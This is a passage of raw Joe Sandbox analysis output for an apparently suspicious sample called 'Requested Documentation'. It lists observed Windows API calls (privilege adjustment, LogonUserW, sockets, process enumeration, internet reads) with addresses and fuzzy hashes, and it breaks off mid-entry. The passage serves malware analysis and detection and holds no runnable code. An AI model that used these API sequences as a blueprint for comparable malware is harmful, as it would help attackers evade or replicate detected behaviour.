                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                              • String ID:
                                                                              • API String ID: 1279440585-0
                                                                              • Opcode ID: 6f5766ece34036f2e6224304d66f2477c28a9ff260deff134f6daa923b499bfc
                                                                              • Instruction ID: 773d2fac65c01014c0710c47ec3785a5b99c642bdf1ced4ee2159f6b90078e56
                                                                              • Opcode Fuzzy Hash: 6f5766ece34036f2e6224304d66f2477c28a9ff260deff134f6daa923b499bfc
                                                                              • Instruction Fuzzy Hash: 9E21A0316002089FCB10EFA4CC45B7EB7A9EF88724F248159FA16A7391C770AD46CB51
                                                                              APIs
                                                                                • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
                                                                                • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                              • _memmove.LIBCMT ref: 009D0258
                                                                              • _memmove.LIBCMT ref: 009D036D
                                                                              • _memmove.LIBCMT ref: 009D0414
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1300846289-0
                                                                              • Opcode ID: 15aded07d1cfce0731c6436245eb1a4f4b7d4d7385e081588e0174bc8b5936f2
                                                                              • Instruction ID: 35b169e46b8b9fc8796f0d7103344d16cc07198aa3dc92192e557289e88c0f42
                                                                              • Opcode Fuzzy Hash: 15aded07d1cfce0731c6436245eb1a4f4b7d4d7385e081588e0174bc8b5936f2
                                                                              • Instruction Fuzzy Hash: 1A02C270A00205DBCF04DFA8D981BAEBBB5FF85300F65846AE80ADB355EB35D951CB91
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 009819FA
                                                                              • GetSysColor.USER32(0000000F), ref: 00981A4E
                                                                              • SetBkColor.GDI32(?,00000000), ref: 00981A61
                                                                                • Part of subcall function 00981290: DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ColorProc$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 3744519093-0
                                                                              • Opcode ID: a0cfb83ac223f2bacc4c3bf0f01655df386d46533b28021aebd7faa8d4f0e598
                                                                              • Instruction ID: d3e3ce2a4489e55f6b66f4ffd25187a94a1280fee0aca60ecf082bcbc2a3e1eb
                                                                              • Opcode Fuzzy Hash: a0cfb83ac223f2bacc4c3bf0f01655df386d46533b28021aebd7faa8d4f0e598
                                                                              • Instruction Fuzzy Hash: F4A14B71102548FFE72CBB28DD44EBF359CDB82365B140A1AF502D63E2DA699D0393B1
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009EBCE6
                                                                              • _wcscmp.LIBCMT ref: 009EBD16
                                                                              • _wcscmp.LIBCMT ref: 009EBD2B
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 009EBD3C
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 009EBD6C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 2387731787-0
                                                                              • Opcode ID: 8ff048899f0d67c3f9757e1f80850c33eb7c3d1cac9b0c90b9128152fc065488
                                                                              • Instruction ID: 46242d4b9e936d4acd2a30cd374a908a513247b1b1305fa82a8c4416bfa99df4
                                                                              • Opcode Fuzzy Hash: 8ff048899f0d67c3f9757e1f80850c33eb7c3d1cac9b0c90b9128152fc065488
                                                                              • Instruction Fuzzy Hash: 9C51CE756046029FC715DF68D890EAAB3E8FF8A320F14461DF95A8B3A1DB30ED45CB91
                                                                              APIs
                                                                                • Part of subcall function 009F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F7DB6
                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009F679E
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F67C7
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 009F6800
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F680D
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 009F6821
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 99427753-0
                                                                              • Opcode ID: 0e0ed3fc16ae94b29f29de450b0fe1c07c62fe45a93e8d14f7c9755290ad1688
                                                                              • Instruction ID: 336d59ba67a1272f0d673117fdfdfbf4838dbd61df9150dcbbba3bc6c36803a9
                                                                              • Opcode Fuzzy Hash: 0e0ed3fc16ae94b29f29de450b0fe1c07c62fe45a93e8d14f7c9755290ad1688
                                                                              • Instruction Fuzzy Hash: D741A175A00214AFDB50FF648C86F7E77A8DF89714F48845CFA1AAB3D2CA74AD018791
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 5c7bf7f2897f341c041e9831c65949fb9353a87304659b8f1c1bbf3cd6891df9
                                                                              • Instruction ID: 5a35a0d6c1a61fab20b93eb9d00c8b6adeb30110a380b6ba407345bb09f3232d
                                                                              • Opcode Fuzzy Hash: 5c7bf7f2897f341c041e9831c65949fb9353a87304659b8f1c1bbf3cd6891df9
                                                                              • Instruction Fuzzy Hash: 1411B631B009195FD731AF76EC54B6B7B99EF847A1B444029F846D7281CB70DC02CEA5
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D80C0
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D80CA
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D80D9
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D80E0
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D80F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
• Instruction ID: cc7e9a9a8df6b4f026ea9dde3d935c45796461c7d1c79df5bbd0ceaadf3ef482
• Opcode Fuzzy Hash: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
• Instruction Fuzzy Hash: D4F06231258308AFEB308FA5EC8DE673BACEF49B55B004136FA45D6251DB619C47DA60
APIs
• CoInitialize.OLE32(00000000), ref: 009EC432
• CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EC44A
  • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
• CoUninitialize.OLE32 ref: 009EC6B7
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
• Opcode ID: 8d0a24a577ae89d78f44fbf26203b0f24d0ed47b3435b39b643f61b40aae4d71
• Instruction ID: 2f258f66794074f278214c01801fc2ee24f25a01d6a05ae554d2bb5bcee3faca
• Opcode Fuzzy Hash: 8d0a24a577ae89d78f44fbf26203b0f24d0ed47b3435b39b643f61b40aae4d71
• Instruction Fuzzy Hash: 19A14B71104205AFD700EF54C881EABB7E8FFC4358F44491DF5969B2A2DB71EA49CB62
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00984AD0), ref: 00984B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984B57
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
• Instruction ID: 92aa80df3787acbd13f986c52c86461a5a4d7b7c324285908ef4fdd560df5376
• Opcode Fuzzy Hash: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
• Instruction Fuzzy Hash: 0BD01234A1071BDFD730EF71E818B0676D8BF05351B11CC3A9485E6A90E670D481CB54
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
• Opcode ID: edc5c3766d02865d63d94d480d17741887decb65246dc2026076371be6dd6155
• Instruction ID: 251a754f0cc748dfbb0e209c9a73706d1d3eb58103638e244ee5ba69f7b6ddf0
• Opcode Fuzzy Hash: edc5c3766d02865d63d94d480d17741887decb65246dc2026076371be6dd6155
• Instruction Fuzzy Hash: 68227A716083019FCB24EF18C881B6EB7E4AFC9314F54891DF89A97291DB75E904CB92
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 009FEE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 009FEE4B
  • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
• Process32NextW.KERNEL32(00000000,?), ref: 009FEF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 009FEF1A
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: 828a6ebe043642d440aa162c509f559ad984eac13bc913631bda8bc9fe4f4bc9
• Instruction ID: 9e118523b17b32bc9f6ab4566710d66c8d19301cda0d97d8eb1dd7e6090ba426
• Opcode Fuzzy Hash: 828a6ebe043642d440aa162c509f559ad984eac13bc913631bda8bc9fe4f4bc9
• Instruction Fuzzy Hash: CA517B71504305AFD320EF24DC81F6BB7E8EF98710F50482DF595962A1EB70E909CB92
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
• Opcode ID: 785372f8690ce1f9aca6c592910bd974dbc2c13ba88b33ef22bb3e781b58fffc
• Instruction ID: 76e1181f2f4c2685655f306a3d253434e85267fc1791f03b9cc44aef6ad73287
• Opcode Fuzzy Hash: 785372f8690ce1f9aca6c592910bd974dbc2c13ba88b33ef22bb3e781b58fffc
• Instruction Fuzzy Hash: 27926B74A083419FDB20DF18C490B2AB7E5BFC9304F14896DE89A9B362D775EC45CB92
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 009DE628
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 22030b4a780c50f5c409ee36ae3766cdef31c4e49618a5aef834f5fdd3722232
• Instruction ID: 746a0c0e65592fcf4ddcd4c6e6471cf698e4c1f28ceb993b3bedfff6f40ad750
• Opcode Fuzzy Hash: 22030b4a780c50f5c409ee36ae3766cdef31c4e49618a5aef834f5fdd3722232
• Instruction Fuzzy Hash: B2323575A407059FDB28DF19C481AAAB7F0FF48320B15C56EE89ADB3A1E770E941CB44
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009F180A,00000000), ref: 009F23E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009F2418
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: ccd106408f1bd49fd640170dfea7a392f86e121cc1efa729ae4844440c1718e3
• Instruction ID: a0c6ee95032fed8390d97683732f4c2ab39253f900e2c2cdbc35137d9a053183
• Opcode Fuzzy Hash: ccd106408f1bd49fd640170dfea7a392f86e121cc1efa729ae4844440c1718e3
• Instruction Fuzzy Hash: DD41D6B160420DBFEB20DF95DC85FBBB7ADEB80714F10442AF705A6150DAB99E419750
APIs
• SetErrorMode.KERNEL32(00000001), ref: 009EB40B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009EB465
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009EB4B2
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: b34ea55e1ebad4a4ff79f6989ebf9308e05c5613ec25b4a45a524f213c555d22
• Instruction ID: bb799e6fe2576cc47647d3ae3484a3e310b8fe44df334376ae0ee7c3087cc5f9
• Opcode Fuzzy Hash: b34ea55e1ebad4a4ff79f6989ebf9308e05c5613ec25b4a45a524f213c555d22
• Instruction Fuzzy Hash: CA214435A00108DFCB00EF95D884AEEBBB8FF89314F1480AAE905EB361DB319D56CB51
APIs
  • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
  • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
• GetLastError.KERNEL32 ref: 009D8865
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 52735bd14c3f13380bf0cd0c476bbfcf0ac7f384d01f0e8e65b82b9bdae60871
• Instruction ID: 3c565849def26ce929d0f0a4404bc072391074483f48725567e3421f570046c5
• Opcode Fuzzy Hash: 52735bd14c3f13380bf0cd0c476bbfcf0ac7f384d01f0e8e65b82b9bdae60871
• Instruction Fuzzy Hash: DB1160B2414305AFE728DF94DC85D6BB7BDEB45710B20852EE45597641EA30BC418B60
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009D8774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009D878B
• FreeSid.ADVAPI32(?), ref: 009D879B
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
• Instruction ID: e58dd1472638d25f280658f81ca81de400ea853d5396a142983629f6bf4a8890
• Opcode Fuzzy Hash: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
• Instruction Fuzzy Hash: 7CF04975E5130CBFDF00DFF4DC89AAEBBBCEF08701F1044A9A901E2681E6716A058B50
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 009EC6FB
• FindClose.KERNEL32(00000000), ref: 009EC72B
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 8b30bf330ba49d74a353418aba63397e9afecefc051376cb0a50dd9091cb50d1
                                                                              • Instruction ID: 43066be4ffa395e5b69645e283ded7e5aabd21341d240b5e8fc91e325a1c3d9b
                                                                              • Opcode Fuzzy Hash: 8b30bf330ba49d74a353418aba63397e9afecefc051376cb0a50dd9091cb50d1
                                                                              • Instruction Fuzzy Hash: 931152716006059FDB10EF29D845A6AF7E9EF85324F04851DF9A597391DB30AC05CB81
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009F9468,?,00A0FB84,?), ref: 009EA097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009F9468,?,00A0FB84,?), ref: 009EA0A9
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: a29653f2341ae2fd5e6e9a1bda2118e03e91f5fbcd1272f3534dc8f506eb1736
• Instruction ID: c94e1f3ed8b809e446a0dc42e02899469f00e60cb4af35fa6b6fa20f3d288f49
• Opcode Fuzzy Hash: a29653f2341ae2fd5e6e9a1bda2118e03e91f5fbcd1272f3534dc8f506eb1736
• Instruction Fuzzy Hash: 7DF0823510522DABDB21AFA4DC48FEA776CBF09361F004165F919D6191D630AA41CBA1
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8309), ref: 009D81E0
• CloseHandle.KERNEL32(?,?,009D8309), ref: 009D81F2
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 4577e5495ea8380fd3994ad79273261b8a5b9fa69e6a12c4d264a26522629565
• Instruction ID: 426e8d39180cb512cca07414eeb1d0bf7c702929f4a2bd3302e4d4907f221fa1
• Opcode Fuzzy Hash: 4577e5495ea8380fd3994ad79273261b8a5b9fa69e6a12c4d264a26522629565
• Instruction Fuzzy Hash: E4E0E671014610AFEB656B60EC09E7777EDEF44310724882DF86584871DB615C92DB50
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,009A8D57,?,?,?,00000001), ref: 009AA15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009AA163
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
• Instruction ID: 852d44631e73d4298108308c162102ad6177f869357cd873c91dcda56cc03cc3
• Opcode Fuzzy Hash: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
• Instruction Fuzzy Hash: EBB0923105820CAFCA106BD1EC09B883F68EB45BB2F404020F61D98860CB6254538A92
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
• Instruction ID: 0d8a13cd8e66671bc2b74dfb3c690fd10dc53bd2d289a52bb9278f2ec874d22b
• Opcode Fuzzy Hash: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
• Instruction Fuzzy Hash: DB320222D2DF014DD7239678D83237AA25DAFB73D4F15D737E81AB59A6EB28C4834140
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
• Instruction ID: 9707fd0b42a2f1164bed0fab5e7e314803fca3f2cbe8447899aceac616cbb394
• Opcode Fuzzy Hash: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
• Instruction Fuzzy Hash: 66B10F20E2AF414DD32396798831336BB5CAFBB2E5F52D71BFC6A74D22EB2185834141
APIs
• __time64.LIBCMT ref: 009E889B
  • Part of subcall function 009A520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009E8F6E,00000000,?,?,?,?,009E911F,00000000,?), ref: 009A5213
  • Part of subcall function 009A520A: __aulldiv.LIBCMT ref: 009A5233
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
• Opcode ID: ecda2e9ce205d7515f6c89274a0d8a37f5a8acf277039f067596ca0f01d5e1e1
• Instruction ID: f3cc068b7a4006e38e4061949f1edc7d9841f5817b980fcf88169a9418f9bd28
• Opcode Fuzzy Hash: ecda2e9ce205d7515f6c89274a0d8a37f5a8acf277039f067596ca0f01d5e1e1
• Instruction Fuzzy Hash: 7121E4366355108BC729CF69D841B52B3E5EFA6310B288E6CD4F9CB2C0CA35BD05CB54
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009E4C4A
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 3ac592659a443a5a1244ebddd4680945d1e04c25c40cfe9e11b9f3aa88a3e6b1
• Instruction ID: 12a61f0f5ef3c0108a5c5590c5c3575448ed8696fd9753b0a49cb619d1132979
• Opcode Fuzzy Hash: 3ac592659a443a5a1244ebddd4680945d1e04c25c40cfe9e11b9f3aa88a3e6b1
• Instruction Fuzzy Hash: 97D05E9116528939EC2E07229E0FFFE030CE340782FF485897181CB0C2EC84AC415430
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009D8389), ref: 009D87D1
Memory Dump Source
